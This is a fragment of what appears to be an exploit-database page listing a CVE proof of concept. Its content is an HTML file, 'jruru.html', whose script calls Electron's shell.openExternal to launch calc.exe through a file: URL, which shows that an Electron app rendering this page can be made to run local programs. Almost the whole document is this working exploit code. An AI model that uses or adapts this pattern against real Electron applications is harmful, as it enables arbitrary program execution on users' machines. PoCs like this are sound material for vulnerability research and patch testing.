4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / jruru.html HTML
<html>
<head>
    <title>jruru</title>
</head>
<body>
<script>
    const { shell } = require('electron');
    shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>